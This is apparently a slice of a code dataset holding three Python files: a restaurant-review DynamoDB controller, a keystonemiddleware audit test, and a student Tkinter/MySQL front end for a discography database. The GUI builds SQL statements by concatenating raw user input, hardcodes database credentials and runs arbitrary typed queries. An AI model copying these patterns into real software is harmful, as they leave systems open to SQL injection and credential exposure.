04}]\n}\n'''\n\n\ndef update_restaurant_review(restaurant_id, item_name, status):\n # boolean status indicates like if it is true\n print(\"request for updating the reviews of \", restaurant_id, \" cuisine, for the item \",\n item_name, \" and the users status is \", status)\n try:\n current_review = restaurant_review_table.get_item(\n Key={\n \"RESTAURANT_ID\": restaurant_id\n }\n )\n except ClientError as e:\n print(e.response['Error']['Message'])\n else:\n found_flag = False\n print(\"GetRestaurant review for updation succeeded:\")\n print(\"response of get item\", current_review)\n if \"Item\" in current_review:\n current_review = current_review[\"Item\"]\n # work on updating the review\n items = current_review[\"ITEMS\"]\n print(\"current review, \", items)\n for item in items:\n if item[\"ITEM_NAME\"] in item_name or item_name in item[\"ITEM_NAME\"]:\n print(\"found the item\")\n if status:\n item[\"ITEM_LIKE_COUNT\"] += 1\n else:\n item[\"ITEM_DISLIKE_COUNT\"] += 1\n found_flag = True\n break\n if not found_flag:\n # item not found, so should add manually\n new_item = {\"ITEM_NAME\": item_name}\n if status:\n new_item[\"ITEM_LIKE_COUNT\"] = 1\n new_item[\"ITEM_DISLIKE_COUNT\"] = 0\n else:\n new_item[\"ITEM_LIKE_COUNT\"] = 0\n new_item[\"ITEM_DISLIKE_COUNT\"] = 1\n items.append(new_item)\n\n # now update the review\n update_response = restaurant_review_table.put_item(\n Item={\n \"RESTAURANT_ID\": restaurant_id,\n \"ITEMS\": items,\n }\n )\n print(\"restaurant update response \", update_response)\n else:\n print(\" this is a new restaurant\")\n items = []\n single_item = {\"ITEM_NAME\": item_name}\n if status:\n single_item[\"ITEM_LIKE_COUNT\"] = 1\n single_item[\"ITEM_DISLIKE_COUNT\"] = 0\n else:\n single_item[\"ITEM_LIKE_COUNT\"] = 0\n single_item[\"ITEM_DISLIKE_COUNT\"] = 1\n items.append(single_item)\n update_response = restaurant_review_table.put_item(\n Item={\n \"RESTAURANT_ID\": restaurant_id,\n \"ITEMS\": items,\n }\n )\n print(\"restaurant update response \", update_response)\n\nupdate_restaurant_review(\"REST_1236\", \"MASALA DOSA\", False)\n'''\ndef update_restaurant_review(request):\n # 600 series of responses\n print(\"updating restaurant profile\")\n request_body = json.loads(request.body.decode(\"utf-8\"))\n update_restaurant_review_response = {}\n if \"USER_TOKEN\" in request_body:\n user_id = get_user_id(request_body[\"USER_TOKEN\"])\n if user_id == 0:\n print(\"invalid user token while updating preferences\")\n update_restaurant_review_response[\"STATUS\"] = 602\n return update_restaurant_review_response\n else:\n print(\"user token is correct\")\n if \"REVIEW\" in request_body:\n review = request_body[\"REVIEW\"]\n # work on the review\n\n else:\n update_restaurant_review_response[\"STATUS\"] = 603\n return update_restaurant_review_response\n else:\n update_restaurant_review_response[\"STATUS\"] = 602\n return update_restaurant_review_response\n'''\n\n\ndef get_cuisines(request):\n print(\"request for cuisines list\")\n cuisine_list_response = {}\n request_body = json.loads(request.body.decode(\"utf-8\"))\n if \"USER_TOKEN\" in request_body:\n user_id = get_user_id(request_body[\"USER_TOKEN\"])\n if user_id == 0:\n print(\"invalid user token while updating preferences\")\n cuisine_list_response[\"STATUS\"] = 502\n return cuisine_list_response\n else:\n cuisines = [\n {'name': 'American'},\n {'name': 'Chinese'},\n {'name': 'Italian'},\n {'name': 'Mexican'},\n {'name': 'Japanese'},\n {'name': 'Caribbean'},\n {'name': 'Spanish'},\n {'name': 'Indian'},\n {'name': 'Asian'},\n {'name': 'Jewish'},\n {'name': 'French'},\n {'name': 'Thai'},\n {'name': 'Korean'},\n {'name': 'Mediterranean'},\n {'name': 'Irish'},\n {'name': 'Seafood'},\n {'name': 'Middle Eastern'},\n {'name': 'Greek'},\n {'name': 'Vietnamese'},\n {'name': 'Russian'},\n {'name': 'Eastern European'},\n {'name': 'African'},\n {'name': 'Turkish'},\n {'name': 'Soul Food'},\n {'name': 'Continental'},\n {'name': 'Pakistani'},\n {'name': 'German'},\n {'name': 'Fillipino'},\n {'name': 'Polish'},\n {'name': 'Brazilian'},\n {'name': 'Ethiopian'},\n {'name': 'Australian'},\n {'name': 'English'},\n {'name': 'Portugese'},\n {'name': 'Egyptian'},\n {'name': 'Indonesian'},\n {'name': 'Chilean'},\n {'name': 'Hawaiian'},\n ]\n cuisine_list_response[\"LIST_OF_CUISINES\"] = cuisines\n return cuisine_list_response\n\n else:\n cuisine_list_response[\"STATUS\"] = 502\n return cuisine_list_response\n","repo_name":"kirankarpurapu/EatOut","sub_path":"CoreApp/Controllers/RestaurantControllers/restaurant_controller.py","file_name":"restaurant_controller.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70472141034","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport tempfile\n\nimport mock\nfrom oslo.config import cfg\nimport testtools\nfrom testtools import matchers\nimport webob\n\nfrom keystonemiddleware import audit\n\n\nclass FakeApp(object):\n def __call__(self, env, start_response):\n body = 'Some response'\n start_response('200 OK', [\n ('Content-Type', 'text/plain'),\n ('Content-Length', str(sum(map(len, body))))\n ])\n return [body]\n\n\nclass FakeFailingApp(object):\n def __call__(self, env, start_response):\n raise Exception('It happens!')\n\n\n@mock.patch('oslo.messaging.get_transport', mock.MagicMock())\nclass AuditMiddlewareTest(testtools.TestCase):\n\n def setUp(self):\n super(AuditMiddlewareTest, self).setUp()\n (self.fd, self.audit_map) = tempfile.mkstemp()\n cfg.CONF([], project='keystonemiddleware')\n\n self.addCleanup(lambda: os.close(self.fd))\n self.addCleanup(cfg.CONF.reset)\n\n @staticmethod\n def _get_environ_header(req_type):\n env_headers = {'HTTP_X_SERVICE_CATALOG':\n '''[{\"endpoints_links\": [],\n \"endpoints\": [{\"adminURL\":\n \"http://host:8774/v2/admin\",\n \"region\": \"RegionOne\",\n \"publicURL\":\n \"http://host:8774/v2/public\",\n \"internalURL\":\n \"http://host:8774/v2/internal\",\n \"id\": \"resource_id\"}],\n \"type\": \"compute\",\n \"name\": \"nova\"},]''',\n 'HTTP_X_USER_ID': 'user_id',\n 'HTTP_X_USER_NAME': 'user_name',\n 'HTTP_X_AUTH_TOKEN': 'token',\n 'HTTP_X_PROJECT_ID': 'tenant_id',\n 'HTTP_X_IDENTITY_STATUS': 'Confirmed'}\n env_headers['REQUEST_METHOD'] = req_type\n return env_headers\n\n def test_api_request(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info') as notify:\n middleware(req)\n # Check first notification with only 'request'\n call_args = notify.call_args_list[0][0]\n self.assertEqual('audit.http.request', call_args[1])\n self.assertEqual('/foo/bar', call_args[2]['requestPath'])\n self.assertEqual('pending', call_args[2]['outcome'])\n self.assertNotIn('reason', call_args[2])\n self.assertNotIn('reporterchain', call_args[2])\n\n # Check second notification with request + response\n call_args = notify.call_args_list[1][0]\n self.assertEqual('audit.http.response', call_args[1])\n self.assertEqual('/foo/bar', call_args[2]['requestPath'])\n self.assertEqual('success', call_args[2]['outcome'])\n self.assertIn('reason', call_args[2])\n self.assertIn('reporterchain', call_args[2])\n\n def test_api_request_failure(self):\n middleware = audit.AuditMiddleware(\n FakeFailingApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info') as notify:\n try:\n middleware(req)\n self.fail('Application exception has not been re-raised')\n except Exception:\n pass\n # Check first notification with only 'request'\n call_args = notify.call_args_list[0][0]\n self.assertEqual('audit.http.request', call_args[1])\n self.assertEqual('/foo/bar', call_args[2]['requestPath'])\n self.assertEqual('pending', call_args[2]['outcome'])\n self.assertNotIn('reporterchain', call_args[2])\n\n # Check second notification with request + response\n call_args = notify.call_args_list[1][0]\n self.assertEqual('audit.http.response', call_args[1])\n self.assertEqual('/foo/bar', call_args[2]['requestPath'])\n self.assertEqual('unknown', call_args[2]['outcome'])\n self.assertIn('reporterchain', call_args[2])\n\n def test_process_request_fail(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info',\n side_effect=Exception('error')) as notify:\n middleware._process_request(req)\n self.assertTrue(notify.called)\n\n def test_process_response_fail(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info',\n side_effect=Exception('error')) as notify:\n middleware._process_response(req, webob.response.Response())\n self.assertTrue(notify.called)\n\n def test_ignore_req_opt(self):\n middleware = audit.AuditMiddleware(FakeApp(),\n audit_map_file=self.audit_map,\n ignore_req_list='get, PUT')\n req = webob.Request.blank('/skip/foo',\n environ=self._get_environ_header('GET'))\n req1 = webob.Request.blank('/skip/foo',\n environ=self._get_environ_header('PUT'))\n req2 = webob.Request.blank('/accept/foo',\n environ=self._get_environ_header('POST'))\n with mock.patch('oslo.messaging.Notifier.info') as notify:\n # Check GET/PUT request does not send notification\n middleware(req)\n middleware(req1)\n self.assertEqual([], notify.call_args_list)\n\n # Check non-GET/PUT request does send notification\n middleware(req2)\n self.assertThat(notify.call_args_list, matchers.HasLength(2))\n call_args = notify.call_args_list[0][0]\n self.assertEqual('audit.http.request', call_args[1])\n self.assertEqual('/accept/foo', call_args[2]['requestPath'])\n\n call_args = notify.call_args_list[1][0]\n self.assertEqual('audit.http.response', call_args[1])\n self.assertEqual('/accept/foo', call_args[2]['requestPath'])\n\n def test_api_request_no_messaging(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('keystonemiddleware.audit.messaging', None):\n with mock.patch('keystonemiddleware.audit._LOG.info') as log:\n middleware(req)\n # Check first notification with only 'request'\n call_args = log.call_args_list[0][0]\n self.assertEqual('audit.http.request',\n call_args[1]['event_type'])\n\n # Check second notification with request + response\n call_args = log.call_args_list[1][0]\n self.assertEqual('audit.http.response',\n call_args[1]['event_type'])\n","repo_name":"opensds/proposals","sub_path":"intel-sds-proto/vsm_configure_guide/packages/vsm_keystone_update/keystonemiddleware/keystonemiddleware/tests/test_audit_middleware.py","file_name":"test_audit_middleware.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"12818642855","text":"# DataBases Project\n# Team 8 - Evangelia Gkagka & Dimitrios Makris\n\nimport mysql.connector as mysql\nfrom mysql.connector import errorcode\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nfrom tkinter import ttk\n\nclass DbConnection():\n def __init__(self, dbname):\n self.dbname = dbname\n self.status = ''''''\n try:\n self.db = mysql.connect(host = 'localhost',\n user = 'db_project',\n password = 'password',\n database = dbname)\n self.cursor = self.db.cursor()\n\n self.cursor.execute(\"use discography_company;\")\n \n except mysql.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n self.status = '''Connection Refused\\nSomething is wrong with\\nyour user name or password'''\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n self.status = '''Connection Refused\\nDatabase does not exist'''\n else:\n self.status = \"Connection Refused\\nA connection error has occurred\"\n else:\n self.status = '''Connection Established'''\n \n def close(self):\n self.db.commit()\n self.db.close()\n \n\n def executeQuery(self, query): \n result = ''''''\n self.error = \"notError\"\n \n try :\n self.cursor.execute(query)\n rowsAffected = self.cursor.rowcount\n for row in self.cursor.fetchall():\n result += (\" | \".join([str(item)for item in row]))\n result += '\\n\\n'\n self.db.commit()\n except mysql.Error as err:\n self.error = err\n result = ''' An error has occurred, please check your query '''\n rowsAffected = 0\n \n return result, rowsAffected\n \n def executeQuery2(self, query): \n self.error = \"notError\"\n \n try :\n self.cursor.execute(query)\n result = self.cursor.fetchall()\n desc = self.cursor.description\n self.db.commit()\n except mysql.Error as err:\n self.error = err\n \n return result, desc\n \n \nclass ScrollableImage(tk.Frame):\n def __init__(self, master=None, **kw):\n self.image = kw.pop('image', None)\n sw = kw.pop('scrollbarwidth', 10)\n super(ScrollableImage, self).__init__(master=master, **kw)\n self.cnvs = tk.Canvas(self, highlightthickness=0, **kw)\n self.cnvs.create_image(0, 0, anchor='nw', image=self.image)\n self.v_scroll = tk.Scrollbar(self, orient='vertical', width=sw)\n self.h_scroll = tk.Scrollbar(self, orient='horizontal', width=sw)\n self.cnvs.grid(row=0, column=0, sticky='nsew')\n self.h_scroll.grid(row=1, column=0, sticky='ew')\n self.v_scroll.grid(row=0, column=1, sticky='ns')\n self.rowconfigure(0, weight=1)\n self.columnconfigure(0, weight=1)\n self.cnvs.config(xscrollcommand=self.h_scroll.set, yscrollcommand=self.v_scroll.set)\n self.v_scroll.config(command=self.cnvs.yview)\n self.h_scroll.config(command=self.cnvs.xview)\n self.cnvs.config(scrollregion=self.cnvs.bbox('all'))\n \n\nclass QueryDesc():\n def __init__(self, txt, query, ypos):\n '''\n input: string = text, string = query, rely = ypos\n '''\n \n #Label\n label = tk.Label(prepFrame, text = txt, font = largeFont, bg = 'black', fg = 'white').place(relx = 0.45, rely = ypos, anchor = 'center')\n\n #Button\n button = tk.Button(prepFrame, height = 2, width = 6, text = \"View\", bg = 'black', fg = 'white', font = smallFont, command = lambda: showResult(query))\n button.place(relx = 0.85, rely = ypos, anchor = 'center')\n \n \n\nclass LabelEntry():\n def __init__(self, text, pos, frame):\n '''\n input: string = text, list = pos = [relx, rely] (of the label), frame = frame\n '''\n\n self.userInput = tk.StringVar()\n\n label = tk.Label(frame, text = text + \":\", font = middleFont, bg = 'black', fg = 'white').place(relx = pos[0], rely = pos[1], anchor = 'center')\n \n entry = tk.Entry(frame, textvariable = self.userInput, font = smallFont).place(relx = pos[0] + 0.15, rely = pos[1], anchor = 'center')\n \n\ndef deleteData():\n flag = 0\n delMemberQuery = '''DELETE FROM member WHERE person_AFM = '''\n \n delAfm = afmInput.get()\n \n delMemberQuery += \"'\" + delAfm + \"'\" + ';'\n \n result, rowsAffected = db.executeQuery(delMemberQuery)\n if(db.error != \"notError\"): flag = 1\n \n if(flag == 0 and rowsAffected != 0):\n deleteSuccess.place(relx = 0.5, rely = 0.8, anchor = 'center')\n deleteSuccessStrV.set(\"Member deleted successfully\")\n \n if(flag == 1 or rowsAffected == 0):\n deleteFailure.place(relx = 0.5, rely = 0.8, anchor = 'center')\n deleteFailureStrV.set(\"An error has occurred, please check your input\")\n \n \n \n afmInput.set('') \n \n\ndef viewMembers():\n raiseFrame(membersFrame)\n \n title = tk.Label(membersFrame, text = \"Details of Members\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(membersFrame, text = \"Menu\", font = middleFont, command = back2MenuDelete, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n backBtn = tk.Button(membersFrame, text = \"Back\", font = middleFont, command = back2DeleteMember, bg = 'black', fg = 'white').place(relx = 0.12, rely = 0.05)\n \n membersQuery = '''SELECT person_AFM, fname, lname FROM member; '''\n \n membersBox = tk.Text(membersFrame, height = 30, width = 70, font = middleFont, bg = slate, fg = 'white')\n membersBox.place(relx = 0.5, rely = 0.5, anchor = 'center')\n \n result, rowsAffected = db.executeQuery(membersQuery)\n membersBox.insert('end', result)\n membersBox.config(state = 'disable')\n \n \n \n\ndef deleteMember():\n raiseFrame(delMemberFrame)\n \n global afmInput\n \n afmInput = tk.StringVar()\n \n title = tk.Label(delMemberFrame, text = \"Delete member from database\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(delMemberFrame, text = \"Menu\", font = middleFont, command = back2MenuDelete, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n delLabel = tk.Label(delMemberFrame, text = \"Enter the member's AFM: \", font = largeFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.3, anchor = 'center')\n \n delAfmEntry = tk.Entry(delMemberFrame, textvariable = afmInput, font = smallFont).place(relx = 0.5, rely = 0.4, anchor = 'center')\n delAfmComment = tk.Label(delMemberFrame, text = '6-digit integer', font = commentFont, bg='black', fg='white').place(relx=0.5, rely=0.43, anchor = 'center')\n \n global deleteSuccessStrV, deleteSuccess\n deleteSuccessStrV = tk.StringVar()\n deleteSuccess = tk.Label(delMemberFrame, textvariable = deleteSuccessStrV, font = largeFont, bg = 'black', fg = 'white')\n\n global deleteFailureStrV, deleteFailure\n deleteFailureStrV = tk.StringVar()\n deleteFailure = tk.Label(delMemberFrame, textvariable = deleteFailureStrV, font = largeFont, bg = 'black', fg = 'white')\n \n delBtn = tk.Button(delMemberFrame, text = \"DELETE\", font = middleFont, command = deleteData, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.65, anchor = 'center')\n \n membersBtn = tk.Button(delMemberFrame, text = \"See all members and their AFM\", font = middleFont, command = viewMembers, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.5, anchor = 'center')\n \n \ndef insertData():\n \n flag = 0\n \n memberQuery = '''INSERT INTO member(person_AFM, fname, lname, email, telephone, birth_date, sex, street_number, street, city, zip_code, country, expertise) VALUES ('''\n contractQuery = '''INSERT INTO contract(start_date, end_date, songs_num, albums_num) VALUES ('''\n artistQuery = '''INSERT INTO artist(name, genre) VALUES ('''\n contractIDQuery = '''SELECT MAX(contract_ID) FROM contract;'''\n artistIDQuery = '''SELECT MAX(artist_ID) FROM artist;'''\n\n afm = afmEntry.userInput.get()\n fname = fnameEntry.userInput.get()\n lname = lnameEntry.userInput.get()\n email = emailEntry.userInput.get()\n tel = telEntry.userInput.get()\n birthdate = birthEntry.userInput.get()\n sex = sexStrV.get()\n address = addressEntry.userInput.get()\n addressNo = addressNoEntry.userInput.get()\n city = cityEntry.userInput.get()\n zipCode = zipCodeEntry.userInput.get()\n country = countryEntry.userInput.get()\n expertise = expertiseEntry.userInput.get()\n\n for el in (afm, fname, lname, email, tel, birthdate, sex, addressNo, address, city, zipCode, country):\n memberQuery += \"'\"\n memberQuery += el\n memberQuery += \"'\"\n memberQuery += ', '\n \n memberQuery += \"'\"\n memberQuery += expertise\n memberQuery += \"'\"\n memberQuery += ');'\n\n startDate = startDateEntry.userInput.get()\n endDate = endDateEntry.userInput.get()\n songsNo = songsNoEntry.userInput.get()\n albumsNo = albumsNoEntry.userInput.get()\n\n for el in (startDate, endDate, songsNo):\n contractQuery += \"'\"\n contractQuery += el\n contractQuery += \"'\"\n contractQuery += ', '\n\n contractQuery += \"'\"\n contractQuery += albumsNo\n contractQuery += \"'\"\n contractQuery += ');'\n\n artist = artistEntry.userInput.get()\n genre = genreEntry.userInput.get()\n\n artistQuery += \"'\" + artist + \"'\" + ', ' + \"'\" + genre + \"'\" + ');'\n \n db.executeQuery(memberQuery)\n if(db.error != \"notError\"): flag = 1\n \n db.executeQuery(contractQuery)\n if(db.error != \"notError\"): flag = 1\n \n db.executeQuery(artistQuery)\n if(db.error != \"notError\"): flag = 1\n \n contract_ID, rowsAffected = db.executeQuery(contractIDQuery)\n if(db.error != \"notError\"): flag = 1\n \n artist_ID, rowsAffected = db.executeQuery(artistIDQuery)\n if(db.error != \"notError\"): flag = 1\n \n mscQuery = \"INSERT INTO Member_Signs_Contract(person_AFM, contract_ID) VALUES ({}, {});\".format(afm, contract_ID)\n mhaQuery = \"INSERT INTO Member_Has_Artist(person_AFM, artist_ID) VALUES ({}, {});\".format(afm, artist_ID)\n \n db.executeQuery(mscQuery)\n if(db.error != \"notError\"): flag = 1\n \n db.executeQuery(mhaQuery)\n if(db.error != \"notError\"): flag = 1\n \n if(flag == 0):\n insertSuccess.place(relx = 0.5, rely = 0.8, anchor = 'center')\n insertSuccessStrV.set(\"Member, contract and artist were entered successfully\")\n \n if(flag == 1):\n insertFailure.place(relx = 0.5, rely = 0.8, anchor = 'center')\n insertFailureStrV.set(\"An error has occurred, please check your inputs\")\n \n for ent in (afmEntry, fnameEntry, lnameEntry, emailEntry, telEntry, birthEntry, addressEntry, addressNoEntry, cityEntry, zipCodeEntry, countryEntry, expertiseEntry, startDateEntry, endDateEntry, songsNoEntry, albumsNoEntry, artistEntry, genreEntry):\n ent.userInput.set('') \n \n sexStrV.set('') \n \n\ndef addMember():\n\n raiseFrame(memberFrame)\n \n\n title1 = tk.Label(memberFrame, text = \"Insert new member to database\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn1 = tk.Button(memberFrame, text = \"Menu\", font = middleFont, command = back2MenuInsert, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n\n title2 = tk.Label(contArtFrame, text = \"Insert member's contract details\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn2 = tk.Button(contArtFrame, text = \"Menu\", font = middleFont, command = back2MenuInsert, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n backBtn = tk.Button(contArtFrame, text = \"Back\", font = middleFont, command = back2NewMember, bg = 'black', fg = 'white').place(relx = 0.12, rely = 0.05)\n\n\n global afmEntry, fnameEntry, lnameEntry, emailEntry, telEntry, birthEntry, addressEntry, addressNoEntry, cityEntry, zipCodeEntry, countryEntry, expertiseEntry, sexStrV, startDateEntry, endDateEntry, songsNoEntry, albumsNoEntry, artistEntry, genreEntry \n\n afmEntry = LabelEntry(\"AFM\", [0.2, 0.2], memberFrame)\n afmComment = tk.Label(memberFrame, text = '6-digit integer', font = commentFont, bg='black', fg='white').place(relx=0.35, rely=0.23, anchor = 'center')\n fnameEntry = LabelEntry(\"First Name\", [0.2, 0.3], memberFrame)\n lnameEntry = LabelEntry(\"Last Name\", [0.2, 0.4], memberFrame)\n emailEntry = LabelEntry(\"Email\", [0.2, 0.5], memberFrame)\n telEntry = LabelEntry(\"Telephone\", [0.2, 0.6], memberFrame)\n birthEntry = LabelEntry(\"Date of Birth\", [0.2, 0.7], memberFrame)\n dateComment = tk.Label(memberFrame, text = 'date format: YYYY-MM-DD', font = commentFont, bg='black', fg='white').place(relx=0.35, rely=0.73, anchor = 'center')\n\n sexLabel = tk.Label(memberFrame, text = \"Sex:\", font = middleFont, bg = 'black', fg = 'white').place(relx = 0.2, rely = 0.8, anchor='center')\n sexStrV = tk.StringVar()\n sexCombo = ttk.Combobox(memberFrame, width = 18, textvariable = sexStrV, state = \"readonly\", values = (\"Male\", \"Female\") ,font = smallFont)\n sexCombo.place(relx = 0.35, rely = 0.8, anchor = 'center')\n\n addressEntry = LabelEntry(\"Address\", [0.6, 0.2], memberFrame)\n addressNoEntry = LabelEntry(\"Address no\", [0.6, 0.3], memberFrame)\n cityEntry = LabelEntry(\"City\", [0.6, 0.4], memberFrame)\n zipCodeEntry = LabelEntry(\"Zip Code\", [0.6, 0.5], memberFrame)\n countryEntry = LabelEntry(\"Country\", [0.6, 0.6], memberFrame)\n expertiseEntry = LabelEntry(\"Expertise\", [0.6, 0.7], memberFrame)\n\n nextBtn = tk.Button(memberFrame, text = \"NEXT\", width = 10, font = middleFont, command = go2ContArt, bg = 'black', fg = 'white').place(relx = 0.75, rely = 0.8, anchor = 'center')\n\n startDateEntry = LabelEntry(\"Start date\", [0.2, 0.2], contArtFrame)\n dateComment1 = tk.Label(contArtFrame, text = 'date format: YYYY-MM-DD', font = commentFont, bg='black', fg='white').place(relx=0.35, rely=0.23, anchor = 'center')\n songsNoEntry = LabelEntry(\"Songs no\", [0.2, 0.3], contArtFrame)\n\n endDateEntry = LabelEntry(\"End date\", [0.6, 0.2], contArtFrame)\n dateComment2 = tk.Label(contArtFrame, text = 'date format: YYYY-MM-DD', font = commentFont, bg='black', fg='white').place(relx=0.75, rely=0.23, anchor = 'center')\n albumsNoEntry = LabelEntry(\"Albums no\", [0.6, 0.3], contArtFrame)\n\n title3 = tk.Label(contArtFrame, text = \"Insert artist's details\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.4, anchor = 'center')\n\n artistEntry = LabelEntry(\"Artist name\", [0.2, 0.5], contArtFrame)\n genreEntry = LabelEntry(\"Genre\", [0.6, 0.5], contArtFrame)\n \n global insertSuccessStrV, insertSuccess\n insertSuccessStrV = tk.StringVar()\n insertSuccess = tk.Label(contArtFrame, textvariable = insertSuccessStrV, font = largeFont, bg = 'black', fg = 'white')\n\n global insertFailureStrV, insertFailure\n insertFailureStrV = tk.StringVar()\n insertFailure = tk.Label(contArtFrame, textvariable = insertFailureStrV, font = largeFont, bg = 'black', fg = 'white')\n\n submitBtn = tk.Button(contArtFrame, text = \"SUBMIT\", width = 10, font = middleFont, bg = 'black', fg = 'white', command = insertData).place(relx = 0.5, rely = 0.65, anchor = 'center')\n \n \ndef raiseFrame(frame):\n frame.tkraise()\n \n\ndef showResultTable(query):\n \n raiseFrame(tableFrame)\n title = tk.Label(tableFrame, text = \"Result Table:\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor='center')\n menuBtn = tk.Button(tableFrame, text = \"Menu\", font=middleFont, command = back2MenuTable, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n global trv\n trv = ttk.Treeview(tableFrame, selectmode = 'browse', height = 25)\n trv.place(relx = 0.5, rely = 0.55, anchor='center')\n \n res, desc = db.executeQuery2(query)\n \n columnsNum = len(desc)\n columnsNames = [i[0] for i in desc]\n \n collst = []\n \n for i in range(columnsNum):\n collst.append(\"{}\".format(i))\n \n trv[\"columns\"] = collst\n \n trv['show'] = 'headings'\n \n for i in range(columnsNum):\n trv.column(\"{}\".format(i), width = 70, anchor ='c')\n \n j = 0\n for col in columnsNames:\n trv.heading(\"{}\".format(j), text = \"{}\".format(col), anchor ='c')\n j += 1\n\n x = 0\n for i in res:\n trv.insert(\"\", 'end', iid = x, values = i)\n x += 1\n \n \ndef showResult(query):\n '''\n input: string\n '''\n \n raiseFrame(resultFrame)\n title = tk.Label(resultFrame, text = \"Result:\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor='center')\n menuBtn = tk.Button(resultFrame, text = \"Menu\", font=middleFont, command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n questionBox = tk.Text(resultFrame, height = 6, width = 70, font = middleFont, bg = slate, fg = 'white')\n questionBox.place(relx = 0.5, rely = 0.25, anchor = 'center')\n \n questionBox.insert('end', query)\n questionBox.config(state = 'disable')\n \n resultBox = tk.Text(resultFrame, height = 15, width = 70, font = middleFont, bg = slate, fg = 'white')\n resultBox.place(relx = 0.5, rely = 0.6, anchor = 'center')\n \n result, rowsAffected = db.executeQuery(query)\n resultBox.insert('end', result)\n resultBox.config(state = 'disable') \n \n global tableBtn\n if (db.error == 'notError'): \n tableBtn = tk.Button(resultFrame, text = \"View in table\", font = largeFont, command = lambda: showResultTable(query), bg = 'black', fg = 'white')\n tableBtn.place(relx = 0.5, rely = 0.85, anchor = 'center')\n \n\ndef viewErd():\n raiseFrame(erdFrame)\n\n title = tk.Label(erdFrame, text = \"Entity Relationship Diagram\", font = titleFont, bg='black', fg='white').place(relx=0.5, rely=0.1, anchor='center')\n menuBtn = tk.Button(erdFrame, text = \"Menu\", font = middleFont,\n command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n\n erd_img = ImageTk.PhotoImage(Image.open(\"assets/erd.png\"))\n\n erd = ScrollableImage(erdFrame, image = erd_img, scrollbarwidth = 15, width = 800, height = 600)\n erd.pack()\n\n erd.place(relx = 0.5, rely = 0.55, anchor='center')\n\n\ndef viewRelSchema():\n raiseFrame(schemaFrame)\n\n title = tk.Label(schemaFrame, text = \"Relational Schema\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(schemaFrame, text = \"Menu\", font = middleFont, command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n\n schema_img = ImageTk.PhotoImage(Image.open(\"assets/schema.png\"))\n\n schema = ScrollableImage(schemaFrame, image = schema_img, scrollbarwidth = 15, width = 800, height = 600)\n schema.pack()\n\n schema.place(relx = 0.5, rely = 0.55, anchor = 'center')\n\n\ndef commandLine():\n raiseFrame(cmdFrame)\n\n title = tk.Label(cmdFrame, text = \"Write your query below\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor='center')\n menuBtn = tk.Button(cmdFrame, text = \"Menu\", font=middleFont, command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n queryBox = tk.Text(cmdFrame, height = 15, width = 70, font = middleFont, bg = slate, fg = 'white')\n queryBox.place(relx = 0.5, rely = 0.45, anchor = 'center')\n\n submitBtn = tk.Button(cmdFrame, text = \"Execute\", font = largeFont, bg = 'black', fg = 'white', command = lambda: showResult(queryBox.get(1.0, 'end'))).place(relx = 0.5, rely = 0.8, anchor = 'center')\n\n\ndef preparedQueries():\n raiseFrame(prepFrame)\n \n title = tk.Label(prepFrame, text = \"Select a query\", font = titleFont, bg = 'black', 